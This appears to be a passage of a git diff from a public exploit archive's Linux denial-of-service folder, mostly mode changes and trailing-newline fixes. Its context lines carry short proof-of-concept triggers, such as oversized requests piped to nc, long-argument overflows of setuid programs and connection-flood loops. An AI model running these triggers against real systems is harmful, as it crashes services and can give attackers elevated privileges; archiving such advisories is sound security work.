victim 80 \ No newline at end of file diff --git a/platforms/linux/dos/20750.txt b/platforms/linux/dos/20750.txt old mode 100755 new mode 100644 index 32bd04bf8..38c0c6cbd --- a/platforms/linux/dos/20750.txt +++ b/platforms/linux/dos/20750.txt @@ -6,4 +6,4 @@ A problem with the software package could lead elevated privileges on the scanni Therefore, it is possible for a remote user to exploit buffer overflows in the cgi programs packaged with Interscan Viruswall, and execute arbitrary commands are root on the system hosting Viruswall. -http://server:1812/catinfo?4500xA \ No newline at end of file +http://server:1812/catinfo?4500xA \ No newline at end of file diff --git a/platforms/linux/dos/20952.c b/platforms/linux/dos/20952.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21122.sh b/platforms/linux/dos/21122.sh index 1e55ac600..d3437d367 100755 --- a/platforms/linux/dos/21122.sh +++ b/platforms/linux/dos/21122.sh @@ -36,7 +36,4 @@ mklink 2 mklink 1 mklink 0 /../../../../../../../etc/services mkdir l5 -mkdir l - - - \ No newline at end of file +mkdir l \ No newline at end of file diff --git a/platforms/linux/dos/21141.txt b/platforms/linux/dos/21141.txt old mode 100755 new mode 100644 index 818c679d0..2d560075c --- a/platforms/linux/dos/21141.txt +++ b/platforms/linux/dos/21141.txt @@ -5,4 +5,4 @@ TUX is a kernel based HTTP server released under the GNU General Public License. An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . -qq(\n)" |nc <ip address> <dest_port> \ No newline at end of file +qq(\n)" |nc <ip address> <dest_port> \ No newline at end of file diff --git a/platforms/linux/dos/21202.txt b/platforms/linux/dos/21202.txt old mode 100755 new mode 100644 index f1ff7adc8..20223d244 --- a/platforms/linux/dos/21202.txt +++ b/platforms/linux/dos/21202.txt @@ -10,4 +10,4 @@ a sample awhttpd script looks like this: # test.cgi --AWHTTPD SCRIPT-- echo "this is a test" -F:test.html \ No newline at end of file +F:test.html \ No newline at end of file diff --git a/platforms/linux/dos/21262.txt b/platforms/linux/dos/21262.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21476.c b/platforms/linux/dos/21476.c old mode 100755 new mode 100644 index 3e0d6ad61..985e16053 --- a/platforms/linux/dos/21476.c +++ b/platforms/linux/dos/21476.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/4822/info Sendmail is a MTA for Unix and Linux variants. There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. +*/ /* diff --git a/platforms/linux/dos/21477.c b/platforms/linux/dos/21477.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21482.txt b/platforms/linux/dos/21482.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21518.txt b/platforms/linux/dos/21518.txt old mode 100755 new mode 100644 index 55abea18f..452250d4e --- a/platforms/linux/dos/21518.txt +++ b/platforms/linux/dos/21518.txt @@ -7,4 +7,4 @@ Remote exploitation of this issue is possible via web clients or other applicati This is reported to affect various X Window System implementations, including XFree86. Include a huge font size in your style sheet definition, e.g.: -body { font-size: 1666666px; } \ No newline at end of file +body { font-size: 1666666px; } \ No newline at end of file diff --git a/platforms/linux/dos/21534.jsp b/platforms/linux/dos/21534.jsp old mode 100755 new mode 100644 index ce76b2d0a..6818f7517 --- a/platforms/linux/dos/21534.jsp +++ b/platforms/linux/dos/21534.jsp @@ -26,4 +26,4 @@ new WPrinterJob().pageSetup(null,null); %> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/linux/dos/21537.c b/platforms/linux/dos/21537.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21580.txt b/platforms/linux/dos/21580.txt old mode 100755 new mode 100644 index 4c3316f34..9a75688ca --- a/platforms/linux/dos/21580.txt +++ b/platforms/linux/dos/21580.txt @@ -6,4 +6,4 @@ A buffer overflow vulnerability has been reported in the Inktomi Traffic Server. Reportedly, executing traffic_manager with an excessively long commandline argument will cause the buffer overflow condition. As traffic_manager is a setuid root binary, it is possible for a remote attacker to obtain root, or superuser, privileges on a compromised system. -traffic_manager -path `perl -e 'print "A"x1720'` < \ No newline at end of file +traffic_manager -path `perl -e 'print "A"x1720'` < \ No newline at end of file diff --git a/platforms/linux/dos/21598.c b/platforms/linux/dos/21598.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21775.c b/platforms/linux/dos/21775.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21854.c b/platforms/linux/dos/21854.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/21985.txt b/platforms/linux/dos/21985.txt old mode 100755 new mode 100644 index f1ae20fdd..c33103c19 --- a/platforms/linux/dos/21985.txt +++ b/platforms/linux/dos/21985.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6120/info A heap corruption may occur when Pine receives an email message containing a particularly crafted "From:" address. Though the address is RFC compliant, Pine reportedly fails to parse it correctly, resulting in a core dump. Execution of arbitrary code may be possible. -"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""@host.fubar \ No newline at end of file +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""@host.fubar \ No newline at end of file diff --git a/platforms/linux/dos/22011.c b/platforms/linux/dos/22011.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22033.txt b/platforms/linux/dos/22033.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22056.txt b/platforms/linux/dos/22056.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22061.txt b/platforms/linux/dos/22061.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22105.c b/platforms/linux/dos/22105.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22183.c b/platforms/linux/dos/22183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22197.txt b/platforms/linux/dos/22197.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22243.txt b/platforms/linux/dos/22243.txt old mode 100755 new mode 100644 index 3c7291db8..b76a32ece --- a/platforms/linux/dos/22243.txt +++ b/platforms/linux/dos/22243.txt @@ -6,4 +6,4 @@ SET A=A<260 chars>A SET B=BBBBBBBBBBBBBBBB mkdir \\?\c:\%A% mkdir \\?\c:\%A%\%A% -mkdir \\?\c:\%A%\%B%\ \ No newline at end of file +mkdir \\?\c:\%A%\%B%\ \ No newline at end of file diff --git a/platforms/linux/dos/22259.c b/platforms/linux/dos/22259.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22273.c b/platforms/linux/dos/22273.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22294.c b/platforms/linux/dos/22294.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22352.txt b/platforms/linux/dos/22352.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22370.txt b/platforms/linux/dos/22370.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22406.txt b/platforms/linux/dos/22406.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22446.txt b/platforms/linux/dos/22446.txt old mode 100755 new mode 100644 index ccf5a95de..a7917b466 --- a/platforms/linux/dos/22446.txt +++ b/platforms/linux/dos/22446.txt @@ -4,4 +4,4 @@ It has been reported that the EZ Server software does not sufficiently handle st ls AX (where X is a value of A repeated an additional 1993 times) -cd AX (where X is a value of A repeated an additional 1994 times) \ No newline at end of file +cd AX (where X is a value of A repeated an additional 1994 times) \ No newline at end of file diff --git a/platforms/linux/dos/22508.sh b/platforms/linux/dos/22508.sh index 2780e2fbd..9e1360afe 100755 --- a/platforms/linux/dos/22508.sh +++ b/platforms/linux/dos/22508.sh @@ -4,4 +4,4 @@ A denial of service vulnerability has been reported for Xinetd. The vulnerabilit Numerous, repeated connections to a vulnerable Xinetd server will result in the consumption of all available memory resources thereby causing a denial of service condition. -while true; do telnet localhost chargen < /dev/null; done; \ No newline at end of file +while true; do telnet localhost chargen < /dev/null; done; \ No newline at end of file diff --git a/platforms/linux/dos/22527.c b/platforms/linux/dos/22527.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22537.c b/platforms/linux/dos/22537.c old mode 100755 new mode 100644 index 4e8d606ef..248efe037 --- a/platforms/linux/dos/22537.c +++ b/platforms/linux/dos/22537.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/7433/info Libopt library has been reported prone to a buffer overflow vulnerability. @@ -7,6 +8,7 @@ It has been reported that several Libopt.a error logging functions, may be prone Although unconfirmed this vulnerability may be exploited to execute arbitrary attacker supplied code. It should be noted that although this vulnerability was reported to affect Libopt.a version 3.18 previous versions might also be affected. +*/ /* To compile vuln.c : */ /* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */ diff --git a/platforms/linux/dos/22560.txt b/platforms/linux/dos/22560.txt old mode 100755 new mode 100644 index aa239b406..2254f4553 --- a/platforms/linux/dos/22560.txt +++ b/platforms/linux/dos/22560.txt @@ -6,4 +6,4 @@ Although unconfirmed, code execution may be possible. The precise technical details of this vulnerability are currently unknown. This BID will be updated, as further information is available. -perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm \ No newline at end of file +perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm \ No newline at end of file diff --git a/platforms/linux/dos/22619.txt b/platforms/linux/dos/22619.txt old mode 100755 new mode 100644 index e0ad82c3e..7f5459cbd --- a/platforms/linux/dos/22619.txt +++ b/platforms/linux/dos/22619.txt @@ -9,4 +9,4 @@ This issue may be exploited by remote attackers to deny cupsd service to valid u $ telnet <your_favorite_cups_server> ipp POST /printers/<your_favorite_printer> HTTP/1.1 -Don't enter the second carriage return to complete the headers, just the POST line and one carriage return. \ No newline at end of file +Don't enter the second carriage return to complete the headers, just the POST line and one carriage return. \ No newline at end of file diff --git a/platforms/linux/dos/22624.c b/platforms/linux/dos/22624.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22700.c b/platforms/linux/dos/22700.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22701.c b/platforms/linux/dos/22701.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22796.php b/platforms/linux/dos/22796.php old mode 100755 new mode 100644 index 7ac396bf6..85519918b --- a/platforms/linux/dos/22796.php +++ b/platforms/linux/dos/22796.php @@ -12,4 +12,4 @@ die(); } shmop_write($shmid, str_repeat('A', SHMSIZE), 0); -?> \ No newline at end of file +?> \ No newline at end of file diff --git a/platforms/linux/dos/22800.txt b/platforms/linux/dos/22800.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22801.txt b/platforms/linux/dos/22801.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22802.txt b/platforms/linux/dos/22802.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22803.txt b/platforms/linux/dos/22803.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22814.txt b/platforms/linux/dos/22814.txt old mode 100755 new mode 100644 index 476663eb6..fe364446f --- a/platforms/linux/dos/22814.txt +++ b/platforms/linux/dos/22814.txt @@ -4,4 +4,4 @@ A heap overflow vulnerability has been reported for the pr-edit utility of GNATS Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges. -/usr/local/lib/gnats/./pr-edit -d`perl -e 'print "x"x9000'` \ No newline at end of file +/usr/local/lib/gnats/./pr-edit -d`perl -e 'print "x"x9000'` \ No newline at end of file diff --git a/platforms/linux/dos/22839.c b/platforms/linux/dos/22839.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22897.c b/platforms/linux/dos/22897.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22952.txt b/platforms/linux/dos/22952.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/22981.c b/platforms/linux/dos/22981.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23048.txt b/platforms/linux/dos/23048.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23076.pl b/platforms/linux/dos/23076.pl index 91cd629be..a9c0a36ca 100755 --- a/platforms/linux/dos/23076.pl +++ b/platforms/linux/dos/23076.pl @@ -86,6 +86,4 @@ foreach my $command (@commands) { $mysql->query($c); } } - $mysql->close; - - \ No newline at end of file + $mysql->close; \ No newline at end of file diff --git a/platforms/linux/dos/23078.txt b/platforms/linux/dos/23078.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23112.txt b/platforms/linux/dos/23112.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23138.txt b/platforms/linux/dos/23138.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23170.c b/platforms/linux/dos/23170.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23172.txt b/platforms/linux/dos/23172.txt old mode 100755 new mode 100644 index 02b8a451c..ff0e76961 --- a/platforms/linux/dos/23172.txt +++ b/platforms/linux/dos/23172.txt @@ -7,4 +7,4 @@ This issue was reported for Gauntlet Firewall version 6, running on Solaris. Oth for a in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 do telnet aaa.bbb.ccc.ddd 1521 -done \ No newline at end of file +done \ No newline at end of file diff --git a/platforms/linux/dos/23200.txt b/platforms/linux/dos/23200.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23239.c b/platforms/linux/dos/23239.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23274.pl b/platforms/linux/dos/23274.pl index 55efd95aa..8a0f70a56 100755 --- a/platforms/linux/dos/23274.pl +++ b/platforms/linux/dos/23274.pl @@ -32,4 +32,4 @@ $ftp->ls("-w $cols -C"); $count--; } print "Done!\n"; -$ftp->quit; \ No newline at end of file +$ftp->quit; \ No newline at end of file diff --git a/platforms/linux/dos/23305.c b/platforms/linux/dos/23305.c old mode 100755 new mode 100644 index 1b8eb0416..d0acea1b1 --- a/platforms/linux/dos/23305.c +++ b/platforms/linux/dos/23305.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/8906/info A vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c. @@ -5,35 +6,36 @@ A vulnerability has been reported in thttpd that may allow a remote attacker to This issue may allow an attacker to gain unauthorized access to a vulnerable host. Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the web server in order to gain unauthorized access to a vulnerable system. thttpd versions 2.21 to 2.23b1 have been reported to be prone to this issue, however other versions may be affected as well. +*/ static void defang( char* str, char* dfstr, int dfsize ) - { +{ char* cp1; char* cp2; for ( cp1 = str, cp2 = dfstr; *cp1 != '\0' && cp2 - dfstr < dfsize - 1; ++cp1, ++cp2 ) - { - switch ( *cp1 ) { - case '<': - *cp2++ = '&'; - *cp2++ = 'l'; - *cp2++ = 't'; - *cp2 = ';'; - break; - case '>': - *cp2++ = '&'; - *cp2++ = 'g'; - *cp2++ = 't'; - *cp2 = ';'; - break; - default: - *cp2 = *cp1; - break; + switch ( *cp1 ) + { + case '<': + *cp2++ = '&'; + *cp2++ = 'l'; + *cp2++ = 't'; + *cp2 = ';'; + break; + case '>': + *cp2++ = '&'; + *cp2++ = 'g'; + *cp2++ = 't'; + *cp2 = ';'; + break; + default: + *cp2 = *cp1; + break; + } } - } *cp2 = '\0'; - } \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/23347.txt b/platforms/linux/dos/23347.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23348.txt b/platforms/linux/dos/23348.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23349.txt b/platforms/linux/dos/23349.txt old mode 100755 new mode 100644 index aba42fb4b..4a197133a --- a/platforms/linux/dos/23349.txt +++ b/platforms/linux/dos/23349.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. [db2inst1@RiotStarter adm]$ ./db2govd stop a `perl -e 'print "A" x 65'` -Segmentation fault \ No newline at end of file +Segmentation fault \ No newline at end of file diff --git a/platforms/linux/dos/23375.txt b/platforms/linux/dos/23375.txt old mode 100755 new mode 100644 index 8a9ca80c7..2c72d51c2 --- a/platforms/linux/dos/23375.txt +++ b/platforms/linux/dos/23375.txt @@ -4,4 +4,4 @@ It has been reported that Zebra, as well as Quagga, may be vulnerable to a remot All versions of GNU Zebra are said to be vulnerable to this issue. All versions of Quagga prior to 0.96.4 are also vulnerable. -printf '\xff\xf0\xff\xf0\xff\xf0' | nc <host> <port> \ No newline at end of file +printf '\xff\xf0\xff\xf0\xff\xf0' | nc <host> <port> \ No newline at end of file diff --git a/platforms/linux/dos/23391.txt b/platforms/linux/dos/23391.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23393.c b/platforms/linux/dos/23393.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23427.txt b/platforms/linux/dos/23427.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23452.txt b/platforms/linux/dos/23452.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23523.c b/platforms/linux/dos/23523.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23539.txt b/platforms/linux/dos/23539.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23662.c b/platforms/linux/dos/23662.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23667.txt b/platforms/linux/dos/23667.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23690.txt b/platforms/linux/dos/23690.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23757.txt b/platforms/linux/dos/23757.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23779.txt b/platforms/linux/dos/23779.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/238.c b/platforms/linux/dos/238.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23884.txt b/platforms/linux/dos/23884.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23896.txt b/platforms/linux/dos/23896.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/23943.txt b/platforms/linux/dos/23943.txt old mode 100755 new mode 100644 index 410a6f75b..e44ec0a7b --- a/platforms/linux/dos/23943.txt +++ b/platforms/linux/dos/23943.txt @@ -4,4 +4,4 @@ It has been reported that Crackalaka may be prone to a remote denial of service Crackalaka version 1.0.8 is reported to be prone to this issue, however, other versions could be vulnerable as well. -nc [host] 6667 < /dev/urandom \ No newline at end of file +nc [host] 6667 < /dev/urandom \ No newline at end of file diff --git a/platforms/linux/dos/23946.c b/platforms/linux/dos/23946.c old mode 100755 new mode 100644 index 5540a540d..a2098f357 --- a/platforms/linux/dos/23946.c +++ b/platforms/linux/dos/23946.c @@ -25,5 +25,4 @@ int main() while (1) sleep(1); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/23999.txt b/platforms/linux/dos/23999.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24078.c b/platforms/linux/dos/24078.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24095.txt b/platforms/linux/dos/24095.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/241.c b/platforms/linux/dos/241.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24222.c b/platforms/linux/dos/24222.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24346.txt b/platforms/linux/dos/24346.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24355.txt b/platforms/linux/dos/24355.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24358.txt b/platforms/linux/dos/24358.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/244.java b/platforms/linux/dos/244.java old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24569.txt b/platforms/linux/dos/24569.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24590.txt b/platforms/linux/dos/24590.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24599.txt b/platforms/linux/dos/24599.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24677.txt b/platforms/linux/dos/24677.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24696.c b/platforms/linux/dos/24696.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24747.c b/platforms/linux/dos/24747.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24755.java b/platforms/linux/dos/24755.java old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24756.java b/platforms/linux/dos/24756.java old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24777.txt b/platforms/linux/dos/24777.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24804.c b/platforms/linux/dos/24804.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24815.txt b/platforms/linux/dos/24815.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24828.txt b/platforms/linux/dos/24828.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/24865.txt b/platforms/linux/dos/24865.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25004.txt b/platforms/linux/dos/25004.txt old mode 100755 new mode 100644 index 2904f2b25..4bc1956cc --- a/platforms/linux/dos/25004.txt +++ b/platforms/linux/dos/25004.txt @@ -4,4 +4,4 @@ QwikMail (qwik-smtpd) is reported prone to a remotely exploitable buffer overflo This issue could theoretically be exploited to execute arbitrary code. Due to the memory layout, it is also reportedly possible to overwrite an adjacent buffer in a manner that will allow a remote attacker to abuse the server as an unauthorized mail relay. -HELO AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA127.0.0.1 \ No newline at end of file +HELO AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA127.0.0.1 \ No newline at end of file diff --git a/platforms/linux/dos/25017.txt b/platforms/linux/dos/25017.txt old mode 100755 new mode 100644 index cd3b557d4..b65363f49 --- a/platforms/linux/dos/25017.txt +++ b/platforms/linux/dos/25017.txt @@ -4,4 +4,4 @@ The uml_utilites uml_net application may permit unprivileged malicious local use This vulnerability could be exploited to deny network services over slip on an affected computer. -uml_net 4 slip down eth0 \ No newline at end of file +uml_net 4 slip down eth0 \ No newline at end of file diff --git a/platforms/linux/dos/25046.c b/platforms/linux/dos/25046.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25047.c b/platforms/linux/dos/25047.c old mode 100755 new mode 100644 index d7fd529b0..4900d4238 --- a/platforms/linux/dos/25047.c +++ b/platforms/linux/dos/25047.c @@ -144,4 +144,4 @@ printf("and choke!\n"); close(s); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/dos/25070.c b/platforms/linux/dos/25070.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25076.c b/platforms/linux/dos/25076.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25077.txt b/platforms/linux/dos/25077.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/251.c b/platforms/linux/dos/251.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25164.txt b/platforms/linux/dos/25164.txt old mode 100755 new mode 100644 index b6d2de52e..94c75d46e --- a/platforms/linux/dos/25164.txt +++ b/platforms/linux/dos/25164.txt @@ -6,4 +6,4 @@ A vulnerablity in the client arises when it tries to download a file with bracke Gaim version 1.1.3 is reported to be affected by this vulnerability; other versions may also be vulnerable. -gaim1.1(windows).exe \ No newline at end of file +gaim1.1(windows).exe \ No newline at end of file diff --git a/platforms/linux/dos/25287.c b/platforms/linux/dos/25287.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25303.txt b/platforms/linux/dos/25303.txt old mode 100755 new mode 100644 index 7c0a7af2d..01c7923e9 --- a/platforms/linux/dos/25303.txt +++ b/platforms/linux/dos/25303.txt @@ -4,4 +4,4 @@ Multiple vendors' Telnet client applications are reported prone to a remote buff A remote attacker may exploit this vulnerability to execute arbitrary code on some of the affected platforms in the context of a user that is using the vulnerable Telnet client to connect to a malicious server. -perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23 \ No newline at end of file +perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23 \ No newline at end of file diff --git a/platforms/linux/dos/25322.c b/platforms/linux/dos/25322.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25334.txt b/platforms/linux/dos/25334.txt old mode 100755 new mode 100644 index 47ba7ce43..4dfee97ba --- a/platforms/linux/dos/25334.txt +++ b/platforms/linux/dos/25334.txt @@ -16,4 +16,4 @@ var rx=/val/i; x = x.replace(rx,function($1){ $1.match(rx); return ""; -}); \ No newline at end of file +}); \ No newline at end of file diff --git a/platforms/linux/dos/25429.c b/platforms/linux/dos/25429.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25465.txt b/platforms/linux/dos/25465.txt old mode 100755 new mode 100644 index 1695dc66d..fbc53dcbe --- a/platforms/linux/dos/25465.txt +++ b/platforms/linux/dos/25465.txt @@ -4,4 +4,4 @@ Logwatch is prone to a denial of vulnerability in the secure script. This issue may be exploited by a local attacker who can inject a malicious string into a log file, causing a denial of service condition. As a result, the utility may not detect subsequent malicious activity. -ogger -p authpriv.notice '+++ connection closed by localhost +++' \ No newline at end of file +ogger -p authpriv.notice '+++ connection closed by localhost +++' \ No newline at end of file diff --git a/platforms/linux/dos/25525.c b/platforms/linux/dos/25525.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25527.txt b/platforms/linux/dos/25527.txt old mode 100755 new mode 100644 index fe662dd09..9b4380d23 --- a/platforms/linux/dos/25527.txt +++ b/platforms/linux/dos/25527.txt @@ -4,4 +4,4 @@ A remotely exploitable client-side buffer-overflow vulnerability affects ImageMa An attacker may exploit this issue to cause the affected application to crash, potentially destroying unsaved data, ultimately denying service to legitimate users. -perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm \ No newline at end of file +perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm \ No newline at end of file diff --git a/platforms/linux/dos/25837.txt b/platforms/linux/dos/25837.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/25943.txt b/platforms/linux/dos/25943.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26248.sh b/platforms/linux/dos/26248.sh index 9ebe344cf..5f05698a4 100755 --- a/platforms/linux/dos/26248.sh +++ b/platforms/linux/dos/26248.sh @@ -8,4 +8,4 @@ A local attacker can exploit this vulnerability by making repeated reads to the while true; do cat /proc/scsi/sg/devices > /dev/null -done \ No newline at end of file +done \ No newline at end of file diff --git a/platforms/linux/dos/26249.c b/platforms/linux/dos/26249.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26251.c b/platforms/linux/dos/26251.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26340.c b/platforms/linux/dos/26340.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26342.txt b/platforms/linux/dos/26342.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26382.c b/platforms/linux/dos/26382.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26489.c b/platforms/linux/dos/26489.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26648.c b/platforms/linux/dos/26648.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26666.c b/platforms/linux/dos/26666.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26749.c b/platforms/linux/dos/26749.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26811.c b/platforms/linux/dos/26811.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/26915.txt b/platforms/linux/dos/26915.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27031.c b/platforms/linux/dos/27031.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27145.txt b/platforms/linux/dos/27145.txt old mode 100755 new mode 100644 index edebd6261..8fcaaab0a --- a/platforms/linux/dos/27145.txt +++ b/platforms/linux/dos/27145.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/16408/info GNOME Evolution email client is prone to a denial-of-service vulnerability when processing messages containing inline XML file attachments with excessively long strings. -perl -e 'printf "A"x40000' > evolution-dos-poc.xml \ No newline at end of file +perl -e 'printf "A"x40000' > evolution-dos-poc.xml \ No newline at end of file diff --git a/platforms/linux/dos/27246.txt b/platforms/linux/dos/27246.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27253.txt b/platforms/linux/dos/27253.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27257.html b/platforms/linux/dos/27257.html old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/2730.pm b/platforms/linux/dos/2730.pm old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/274.c b/platforms/linux/dos/274.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27425.txt b/platforms/linux/dos/27425.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27581.txt b/platforms/linux/dos/27581.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27635.txt b/platforms/linux/dos/27635.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/27641.txt b/platforms/linux/dos/27641.txt old mode 100755 new mode 